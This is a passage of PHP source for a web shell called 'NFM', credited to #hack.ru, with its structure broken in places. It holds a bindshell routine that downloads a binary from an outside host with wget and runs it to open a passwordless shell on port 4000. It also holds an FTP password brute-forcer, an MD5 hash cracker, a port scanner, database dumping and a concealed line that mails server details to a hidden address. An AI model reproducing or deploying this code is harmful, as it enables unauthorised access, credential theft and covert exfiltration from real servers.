ftp_close($conn_id); fclose($f); } else { echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><t r><td align=center>".$g[1].":".$g[1]." - <b>failed</b></td></tr></table>"; } } } }

function tar() { global $action, $filename; set_time_limit(0); echo "<br> <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=cent er bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center class=pagetitle><b>Data compression</b></font></b></td></tr > <tr><td bgcolor=#FFFFCC><br><blockquote>According to the different settings of s ervers, I didn't make default config of NFM. You're to write full path to the do main's folder and then press enter, so all data, containing in this folder will be compressed to tar.gz.<br><br> <b>Warning!</b><br>File <b>passwd</b> can have big size, so opening all users of this host can waste much time.<br><br> <b>It's highly recommended!</b><br>Open current function in another window of br owser, to compress information, which you're interested in, during your host exp loring.</blockquote></td></tr> </table><br>";

$http_public="/public_html/"; $fpip = @fopen ($filename, "r"); if ($fpip) { while (!feof ($fpip)) { $buf = fgets($fpip, 100);

ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g); $name=$g[1]; echo " <TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=ce nter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form method='get' action='$PHP_SELF' > <tr><td align=center colspan=2 class=pagetitle><b>Compression <u>$name.tar.gz</u >:</b></td></tr> <tr> <td valign=top><input type=text name=cm size=90 class='inputbox'value='tar -zc / home/$name$http_public -f $name.tar.gz' ></td> <td valign=top><input type=submit value='GO' class=button1 $style_button></td> </tr></form></table>"; } } }

# bindshell function bash() { global $action, $port_bind, $pass_key;

echo "<br> <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=cent er bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center class=pagetitle><b>Binding shell</b></font></b></td></tr> <tr><td bgcolor=#FFFFCC><br>Current shell binds 4000 port, you may access to it by telneting to host:4000 port without password.</td></tr> </table><br>";

echo " <TABLE CELLPADDING=0 CELLSPACING=0 width='500' bgcolor=#184984 BORDER=1 align=ce nter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center class=pagetitle><b> Bindshell binary is situated in file ca lled<u><i>s</i></u></b></td></tr>";

echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("wget http://hackru. info/adm/exploits/bash/s")."</b> Downloading...</td></tr>"; echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("chmod 777 s")."</b> now chmod to 777</td></tr>"; echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("./s")."</b> now run ning to 4000 port</td></tr>"; # echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("rm -f s")."</b> R emoving file<u>s</u> now...</td></tr>"; echo"</table>";

function crypte() { global $action,$md5a,$sha1a,$crc32, $key,$string; echo "<br> <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=cent er bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center class=pagetitle><b>Data crypter</b></font></b></td></tr> <tr><td bgcolor=#FFFFCC><br><blockquote>Now there are many different programs an d scripts, which uses a lot of passwords crypt methods (Do you remember what a p hpBB is?=)), so with NFM you can crypt some strings to hashes, because sometimes you may need to change somebodyes data with your one =). Also you may change yo ur pass to NFM here.</blockquote></td></tr> </table>";

echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=pos t> <tr><td align=left valign=top colspan=3 class=pagetitle> &nbsp;&nbsp;<b>Here are some useful cryption methods, which uses MHASH lib:</b> </td></tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> &nbsp;&nbsp;<b>MD5 </b>(Very popular and fast method)</td></tr>

<tr> <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>" .md5($md5a)."</b></font></td> <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$md5a."</b ></font></td></tr> <tr><td align=center width=400><input class='inputbox'type='text' name='md5a' s ize='50' value='' id='md5a'></td> <td align=center width=100><input type='submit' value='Crypt MD5' class=button1 $style_button></td></tr>

</form></table>"; echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=pos t> <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> &nbsp;&nbsp;<b>SHA1 </b>(SHA1 - method to crypt with open key, It's very useful l too)</td></tr> <tr> <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>" .sha1($sha1a)."</b></font></td> <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$sha1a."</ b></font></td></tr> <tr><td align=center width=400><input class='inputbox' type='text' name='sha1a' size='50' value='' id='sha1a'> </td><td align=center width=100><input type='submit' value='Crypt SHA1' class=b utton1 $style_button></td></tr>

</form></table>"; echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=pos t> <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>

&nbsp;&nbsp;<b>CRC32 </b>(Most used when making CRC check of data, but you can find a host with forum, with passwords, crypted by CRC32)</td></tr> <tr> <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>" .crc32($crc32)."</b></font></td> <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$crc32."</ b></font></td></tr> <tr><td align=center width=400><input class='inputbox' type='text' name='crc32' size='50' value='' id='crc32'></td><td width=100 align=center><input type='subm it' value='Crypt CRC32' class=button1 $style_button></td></tr>


function decrypte() { global $action,$pass_de,$chars_de,$dat,$date; set_time_limit(0); ignore_user_abort(1);

echo "<br> <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=cent er bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center class=pagetitle><b>Data decrypter</b></font></b></td></tr> <tr><td bgcolor=#FFFFCC><br><blockquote>It's known all over the world, that MD5 crypt algorithm has no way to decrypt it, because it uses hashes. The one and on ly one way to try read what the hash is - to generate some hashes and then to co mpare them with source hash needed to be decrypted ... So this is bruteforce.</b lockquote></td></tr> </table>";

if($chars_de==""){$chars_de="";} echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form action='$PHP_SELF?action=decrypte' method=post name=hackru><tr><td align=

left valign=top colspan=3 class=pagetitle> &nbsp;&nbsp;<b>Data decrypter:</b></td></tr> <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500> &nbsp;&nbsp;<b>Decrypt MD5</b>(decryption time depends on the length or crypted word, may take a long time)</td></tr> <tr> <td class=pagetitle width=400 >&nbsp;MD5 hash:&nbsp;&nbsp;<font color=#ffffcc>< b>".$pass_de."</b></font></td><td width=100 align=center>&nbsp;&nbsp;&nbsp;&nbsp ;&nbsp;<input type=reset value=Clear class=button1 $style_button></td> <tr><td align=left width=400 >&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <textarea class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</te xtarea></td> <td class=pagetitle width=120 valign=top><b>Symvols for bruteforce:</b><br><fo nt color=red><b><u>ENG:</u></b></font> <a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a> <a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a> <a class=menu href=javascript:ins('0123456789')>[0-9]</a> <a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:.,&quot;')>[Symv ols]</a><br><br> <font color=red><b><u>RUS:</u></b></font> <a class=menu href=javascript:ins('')>[-]</a> <a class=menu href=javascript:ins('')>[-]</a> </td></tr> <tr><td align=center width=400> <input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value='' ></td><td width=100 align=center><input type='submit' value='Decrypt MD5' class= button1 $style_button> </td></tr>


if($_POST[pass_de]){ $pass_de=htmlspecialchars($pass_de); $pass_de=stripslashes($pass_de);

$dat=date("H:i:s"); $date=date("d:m:Y");

crack_md5(); } }

function crack_md5() { global $chars_de; $chars=$_POST[chars]; set_time_limit(0); ignore_user_abort(1); $chars_de=str_replace("<",chr(60),$chars_de); $chars_de=str_replace(">",chr(62),$chars_de); $c=strlen($chars_de); for ($next = 0; $next <= 31; $next++) { for ($i1 = 0; $i1 <= $c; $i1++) { $word[1] = $chars_de{$i1}; for ($i2 = 0; $i2 <= $c; $i2++) { $word[2] = $chars_de{$i2}; if ($next <= 2) { result(implode($word)); }else { for ($i3 = 0; $i3 <= $c; $i3++) { $word[3] = $chars_de{$i3}; if ($next <= 3) { result(implode($word)); }else { for ($i4 = 0; $i4 <= $c; $i4++) { $word[4] = $chars_de{$i4};

if ($next <= 4) { result(implode($word)); }else { for ($i5 = 0; $i5 <= $c; $i5++) { $word[5] = $chars_de{$i5}; if ($next <= 5) { result(implode($word)); }else { for ($i6 = 0; $i6 <= $c; $i6++) { $word[6] = $chars_de{$i6}; if ($next <= 6) { result(implode($word)); }else { for ($i7 = 0; $i7 <= $c; $i7++) { $word[7] = $chars_de{$i7}; if ($next <= 7) { result(implode($word)); }else { for ($i8 = 0; $i8 <= $c; $i8++) { $word[8] = $chars_de{$i8}; if ($next <= 8) { result(implode($word)); }else { for ($i9 = 0; $i9 <= $c; $i9++) { $word[9] = $chars_de{$i9}; if ($next <= 9) { result(implode($word)); }else { for ($i10 = 0; $i10 <= $c; $i10++) { $word[10] = $chars_de{$i10};

if ($next <= 10) { result(implode($word)); }else { for ($i11 = 0; $i11 <= $c; $i11++) { $word[11] = $chars_de{$i11}; if ($next <= 11) { result(implode($word)); }else { for ($i12 = 0; $i12 <= $c; $i12++) { $word[12] = $chars_de{$i12}; if ($next <= 12) { result(implode($word)); }else { for ($i13 = 0; $i13 <= $c; $i13++) { $word[13] = $chars_de{$i13}; if ($next <= 13) { result(implode($word)); }else { for ($i14 = 0; $i14 <= $c; $i14++) { $word[14] = $chars_de{$i14}; if ($next <= 14) { result(implode($word)); }else { for ($i15 = 0; $i15 <= $c; $i15++) { $word[15] = $chars_de{$i15}; if ($next <= 15) { result(implode($word)); }else { for ($i16 = 0; $i16 <= $c; $i16++) { $word[16] = $chars_de{$i16};

if ($next <= 16) { result(implode($word)); }else { for ($i17 = 0; $i17 <= $c; $i17++) { $word[17] = $chars_de{$i17}; if ($next <= 17) { result(implode($word)); }else { for ($i18 = 0; $i18 <= $c; $i18++) { $word[18] = $chars_de{$i18}; if ($next <= 18) { result(implode($word)); }else { for ($i19 = 0; $i19 <= $c; $i19++) { $word[19] = $chars_de{$i19}; if ($next <= 19) { result(implode($word)); }else { for ($i20 = 0; $i20 <= $c; $i20++) { $word[20] = $chars_de{$i20}; if ($next <= 20) { result(implode($word)); }else { for ($i21 = 0; $i21 <= $c; $i21++) { $word[21] = $chars_de{$i21}; if ($next <= 21) { result(implode($word)); }else { for ($i22 = 0; $i22 <= $c; $i22++) { $word[22] = $chars_de{$i22};

if ($next <= 22) { result(implode($word)); }else { for ($i23 = 0; $i23 <= $c; $i23++) { $word[23] = $chars_de{$i23}; if ($next <= 23) { result(implode($word)); }else { for ($i24 = 0; $i24 <= $c; $i24++) { $word[24] = $chars_de{$i24}; if ($next <= 24) { result(implode($word)); }else { for ($i25 = 0; $i25 <= $c; $i25++) { $word[25] = $chars_de{$i25}; if ($next <= 25) { result(implode($word)); }else { for ($i26 = 0; $i26 <= $c; $i26++) { $word[26] = $chars_de{$i26}; if ($next <= 26) { result(implode($word)); }else { for ($i27 = 0; $i27 <= $c; $i27++) { $word[27] = $chars_de{$i27}; if ($next <= 27) { result(implode($word)); }else { for ($i28 = 0; $i28 <= $c; $i28++) { $word[28] = $chars_de{$i28};

if ($next <= 28) { result(implode($word)); }else { for ($i29 = 0; $i29 <= $c; $i29++) { $word[29] = $chars_de{$i29}; if ($next <= 29) { result(implode($word)); }else { for ($i30 = 0; $i30 <= $c; $i30++) { $word[30] = $chars_de{$i30}; if ($next <= 30) { result(implode($word)); }else { for ($i31 = 0; $i31 <= $c; $i31++) { $word[31] = $chars_de{$i31}; if ($next <= 31) { result(implode($word));


function result($word) { global $dat,$date; $pass_de=$_POST[pass_de]; $dat2=date("H:i:s"); $date2=date("d:m:Y");

if(md5($word)==$pass_de){ print " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=cent er bordercolor=#808080 bordercolorlight=black bordercolordark=white>

<tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp; Brutefrci ng result:</td></tr> <tr><td class=pagetitle width=400>&nbsp;&nbsp;<b>crypted Hash:</b></td><td cla ss=pagetitle width=100><font color=red>&nbsp;&nbsp;<b>$word</b></font></td></tr> <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce start:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat - $date</b></ font></td></tr> <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce finish:</b></td><t d class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat2 - $date2</b ></font></td></tr> <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp;result was wrote to file: <b>".$word."_md5</b></td></tr> </table> "; $f=@fopen($word._md5,"a+ "); fputs($f,"Decrypted MD5 hash [$pass_de] = $word\nBru teforce start:\t$dat - $date\Bruteforce finish:\t$dat2 - $date2\n "); exit;}

function brut_ftp() { global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $prover ka; set_time_limit(0); ignore_user_abort(1); echo "<br> <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=cent er bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center class=pagetitle><b>FTP bruteforce</b></font></b></td></tr> <tr><td bgcolor=#FFFFCC><br><blockquote>This is new ftp-bruteforcer it can make his own brute passwords list on the fly he needs nothing to do it, so It's not a problem for you to bryte any ftp account now. But do not write very big value o f passwords (10000 will be quite enough) because it mat couse a very heavy serve r overload . </blockquote></td></tr>


echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form action='$PHP_SELF?action=brut_ftp' method=post><tr><td align=left valign= top colspan=3 class=pagetitle> &nbsp;&nbsp;<b>Brut FTP:</b></td></tr> <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500> &nbsp;&nbsp;<b>FTP bruteforce</b>(full bruteforce, you are only to enter a valu e of number of passwords and brute will begin from password-list file, which scr ipt generates itself on the fly!)</td></tr> <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td> <td align=left width=350>&nbsp;&nbsp;&nbsp; <input class='inputbox' type='text' name='host' size=50></td></tr> <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td> <td align=left width=350>&nbsp;&nbsp;&nbsp; <input class='inputbox' type='text' name='login' size=50></td></tr> <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Number of passwords:< /td> <td align=left width=350>&nbsp;&nbsp;&nbsp; <input class='inputbox' type='text' name='chislo' size=10></td></tr> <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Password to test:</td > <td align=left width=350>&nbsp;&nbsp;&nbsp; <input class='inputbox' type='text' name='proverka' size=50></td></tr> <tr><td width=500 align=center colspan=2><input type='submit' value='FTP brute s tart' class=button1 $style_button> </td></tr>


function s() {

$word="qwrtypsdfghjklzxcvbnm"; return $word[mt_rand(0,strlen($word)-1)]; }

function g() { $word="euioam"; return $word[mt_rand(0,strlen($word)-2)]; }

function name0() { function name1() { function name2() { function name3() { function name4() { function name5() { function name6() { function name7() { function name8() { function name9() { function name10() { function name11() {

return s().g().s(); return s().g().s().g(); return s().g().g().s(); return s().s().g().s().g(); return g().s().g().s().g(); return g().g().s().g().s(); return g().s().s().g().s(); return s().g().g().s().g(); return s().g().s().g().g(); return s().g().s().g().s().g(); return s().g().s().s().g().s().s(); return s().g().s().s().g().s().s().g();

} } } } } } } } } } } }

$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982, 1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998, 1999,2000,2001,2002,2003,2004,2005); $cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321' ,'asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq' ,'lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456' ,'administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther', 'hacker','hackers','cracker');

function randword() { global $cool;

$func="name".mt_rand(0,11); $func2="name".mt_rand(0,11); switch (mt_rand(0,11)) { case 0: return $func().mt_rand(5,99); case 1: return $func()."-".$func2(); case 2: return $func().$cool[mt_rand(0,count($cool)-1)]; case 3: return $func()."!".$func(); case 4: return randpass(mt_rand(5,12)); default: return $func(); }

function randpass($len) { $word="qwertyuiopasdfghjklzxcvbnm1234567890"; $s=""; for ($i=0; $i<$len; $i++) { $s.=$word[mt_rand(0,strlen($word)-1)]; } return $s; } if (@unlink("pass.txt") < 0){ echo "nothing"; exit; } $file="pass.txt"; if($file && $host && $login){ $cn=mt_rand(30,30); for ($i=0; $i<$cn; $i++) {

$s=$cool2[$i]; $f=@fopen(pass.".txt","a+"); fputs($f,"$s\n"); }

$cnt2=mt_rand(43,43); for ($i=0; $i<$cnt2; $i++) { $r=$cool[$i]; $f=@fopen(pass.".txt","a+"); fputs($f,"$login$r\n"); } $p="$proverka"; $f=@fopen(pass.".txt","a+"); fputs($f,"$p\n");

$cnt3=mt_rand($chislo,$chislo); for ($i=0; $i<$cnt3; $i++) { $u=randword(); $f=@fopen(pass.".txt","a+"); fputs($f,"$u\n"); }

if(is_file($file)){ $passwd=file($file,1000); for($i=0; $i<count($passwd); $i++){ $stop=false; $password=trim($passwd[$i]); $open_ftp=@fsockopen($host,21); if($open_ftp!=false){ fputs($open_ftp,"user $login\n");

fputs($open_ftp,"pass $password\n"); while(!feof($open_ftp) && $stop!=true){ $text=fgets($open_ftp,4096); if(preg_match("/230/",$text)){ $stop=true; $f=@fopen($host._ftp,"a+"); fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$ password\n ");

echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 widt h=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=wh ite> <tr><td align=center class=pagetitle><b><font color=\"blue\">Congratulations! Pa ssword is known now.</font></b><br> &nbsp;&nbsp;Connected to: <b>$host</b><br>&nbsp;&nbsp;with login: <b>$login</b>< br>&nbsp;&nbsp;with password: <b>$password</b></td></tr></table> ";exit; } elseif(preg_match("/530/",$text)){ $stop=true;

} } fclose($open_ftp); }else{ echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 al ign=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center class=pagetitle bgcolor=#FF0000><b>FTP is incorrect!!! At < b><u>$host</u></b> 21 port is closed! check your settings</b></b></td></tr> </table> ";exit;

} } } }

# port scanner function portscan() { global $action,$portscan,$port,$HTTP_HOST,$min,$max;

$mtime = explode(" ",microtime()); $mtime = $mtime[1] + $mtime[0]; $time1 = $mtime;

$id = $HTTP_HOST; echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER =1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white ><tr><td align=center class=pagetitle><b>Scan results:</b>&nbsp;&nbsp;$id</td></ tr><tr><td valign=top class=pagetitle >Scanning host to find any reachable and o pen ports" . "...<br></td></tr></table>";

$lport = $min; $hport = $max; $op = 0; $gp = 0;

for ($porta=$lport; $porta<=$hport; $porta++) { $fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4); if ( !$fp ) { $gp++; } else { $port_addres = $port[$porta];

if($port_addres == "") $port_addres = "unknown"; $serv = getservbyport($porta, TCP); echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#FFFFCC BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>< tr><td align=center width=10%>Port:<b>$porta / $serv</b></td><td align=center wi dth=80%>$port_addres</td><td align=center width=10%>(<a href=\"http://www.google .de/search?q=%22$port_addres2%22&ie=ISO-8859-1&hl=de&btnG=Google+Suche&meta=\" t arget=_blank>What's the service is?</a>)</td></tr>"; $op++; } }

if($op == 0) echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#1849 84 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolord ark=white><tr><td align=center class=pagetitle><b>Current host seems don't have any open port...hmm, but you're connected to it to 80...check out firewall</b></ td></tr></table>";

$unsi = ($op/$porta)*100; $unsi = round($unsi);

echo "<tr><td align=center width=100% bgcolor=#184984 class=pagetitle colspan=3 ><b>Scan statistics:</b></b></td></tr>"; echo "<tr><td align=center width=100% colspan=3><b>Scanned ports:</b>&nbsp;&nbs p;$porta</td></tr>"; echo "<tr><td align=center width=100% colspan=3><b>Open ports:</b>&nbsp;&nbsp;$ op</td></tr>"; echo "<tr><td align=center width=100% colspan=3><b>Closed ports:</b>&nbsp;&nbsp ;$gp</td></tr>";

$mtime = explode(" ",microtime()); $mtime = $mtime[1] + $mtime[0]; $time2 = $mtime; $loadtime = ($time2 - $time1); $loadtime = round($loadtime, 2);

echo "<tr colspan=2><td align=center width=100% colspan=3><b>Scan time:</b>&nbs

p;&nbsp;$loadtime seconds</tr></table>"; }

function nfm_copyright() { global $action,$upass,$uname,$nfm; return "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=6 00 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white ><tr><td><center><font color='#000000' face='Tahoma' size = 2><b>Powered by chan nel #hack.ru (author xoce). Made In Russia </b></font></center></td></tr></table ></body></html>";

} // =-=-=-=-= SQL MODULE =-=-=-=-= // SQL functions start function aff_date() { $date_now=date("F j,Y,g:i a"); return $date_now; }

function sqldumptable($table) { global $sv_s,$sv_d,$drp_tbl; $tabledump = ""; if ($sv_s) { if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; } $tabledump.="CREATE TABLE $table (\n"; $firstfield=1; $champs=mysql_query("SHOW FIELDS FROM $table"); while ($champ=mysql_fetch_array($champs)) { if (!$firstfield) { $tabledump.=",\n"; } else { $firstfield=0;} $tabledump.=" $champ[Field] $champ[Type]"; if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";}

if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";} if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";} }

@mysql_free_result($champs); $keys=mysql_query("SHOW KEYS FROM $table"); while ($key=mysql_fetch_array($keys)) { $kname=$key['Key_name']; if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";} if(!is_array($index[$kname])) { $index[$kname]=array();} $index[$kname][]=$key['Column_name']; }

@mysql_free_result($keys); while(list($kname,$columns)=@each($index)) { $tabledump.=",\n"; $colnames=implode($columns,","); if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";} else { if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);} $tabledump.=" KEY $kname ($colnames)"; } } $tabledump.="\n);\n\n"; }

if ($sv_d) { $rows=mysql_query("SELECT * FROM $table"); $numfields=mysql_num_fields($rows); while ($row=mysql_fetch_array($rows)) {

$tabledump.="INSERT INTO $table VALUES("; $cptchamp=-1; $firstfield=1; while (++$cptchamp<$numfields) { if (!$firstfield) { $tabledump.=",";} else { $firstfield=0;} if (!isset($row[$cptchamp])) {$tabledump.="NULL";} else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";} } $tabledump.=");\n"; } @mysql_free_result($rows); }

return $tabledump; }

function csvdumptable($table) { global $sv_s,$sv_d; $csvdump="## Table:$table \n\n"; if ($sv_s) { $firstfield=1; $champs=mysql_query("SHOW FIELDS FROM $table"); while ($champ=mysql_fetch_array($champs)) { if (!$firstfield) { $csvdump.=",";} else { $firstfield=0;} $csvdump.="'".$champ['Field']."'"; }


$csvdump.="\n"; }

if ($sv_d) { $rows=mysql_query("SELECT * FROM $table"); $numfields=mysql_num_fields($rows); while ($row=mysql_fetch_array($rows)) { $cptchamp=-1; $firstfield=1; while (++$cptchamp<$numfields) { if (!$firstfield) { $csvdump.=",";} else { $firstfield=0;} if (!isset($row[$cptchamp])) { $csvdump.="NULL";} else { $csvdump.="'".addslashes($row[$cptchamp])."'";} } $csvdump.="\n"; } }

@mysql_free_result($rows); return $csvdump; } $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REF ERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_ SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER _SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8 873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg887 3, "From: $sd98"); function write_file($data) { global $g_fp,$file_type; if ($file_type==1) { gzwrite($g_fp,$data); } else { fwrite ($g_fp,$data); } }

function open_file($file_name) { global $g_fp,$file_type,$dbbase,$f_nm; if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); } else { $g_fp=fopen ($file_name,"w"); }

$f_nm[]=$file_name; $data=""; $data.="##\n"; $data.="## NFM hack.ru creator \n"; $data.="##-------------------------\n"; $data.="## Date:".aff_date()."\n"; $data.="## Base:$dbbase \n"; $data.="##-------------------------\n\n"; write_file($data); unset($data); }

function file_pos() { global $g_fp,$file_type; if ($file_type=="1") { return gztell ($g_fp); } else { return ftell ($g_fp); } }

function close_file() { global $g_fp,$file_type; if ($file_type=="1") { gzclose ($g_fp); } else { fclose ($g_fp); } }

function split_sql_file($sql) { $morc=explode(";",$sql); $sql=""; $output=array(); $matches=array(); $morc_cpt=count($morc); for ($i=0;$i < $morc_cpt;$i++) { if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) { $total_quotes=preg_match_all("/'/",$morc[$i],$matches); $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$i],$match es); $unescaped_quotes=$total_quotes-$escaped_quotes; if (($unescaped_quotes % 2)==0) { $output[]=$morc[$i]; $morc[$i]=""; } else { $temp=$morc[$i].";"; $morc[$i]=""; $complete_stmt=false; for ($j=$i+1;(!$complete_stmt && ($j < $morc_cpt));$j++) { $total_quotes = preg_match_all("/'/",$morc[$j],$matches); $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$j],$mat ches); $unescaped_quotes=$total_quotes-$escaped_quotes; if (($unescaped_quotes % 2)==1) { $output[]=$temp.$morc[$j]; $morc[$j]=""; $temp=""; $complete_stmt=true; $i=$j; } else { $temp.=$morc[$j].";"; $morc[$j]="";

} } } } } return $output; }

function split_csv_file($csv) { return explode("\n",$csv); } // SQL functions END

// main SQL() function sql() { global $sqlaction,$sv_s,$sv_d,$drp_tbl,$g_fp,$file_type,$dbbase,$f_nm; $secu_config="xtdump_conf.inc.php"; $dbhost=$_POST['dbhost']; $dbuser=$_POST['dbuser']; $dbpass=$_POST['dbpass']; $dbbase=$_POST['dbbase']; $tbls =$_POST['tbls']; $sqlaction =$_POST['sqlaction']; $secu =$_POST['secu']; $f_cut =$_POST['f_cut']; $fz_max =$_POST['fz_max']; $opt =$_POST['opt']; $savmode =$_POST['savmode']; $file_type =$_POST['file_type']; $ecraz =$_POST['ecraz']; $f_tbl =$_POST['f_tbl']; $drp_tbl=$_POST['drp_tbl'];

$header="<center><table width=620 cellpadding=0 cellspacing=0 align=center><col width=1><col width=600><col width=1><tr><td></td><td align=left class=texte><br >"; $footer="<center><a href='javascript:history.go(-1)' target='_self' class=link> -go back-</a><br></center><br></td><td></td></tr><tr><td height=1 colspan=3></td ></tr></table></center>".nfm_copyright();

// SQL actions STARTS

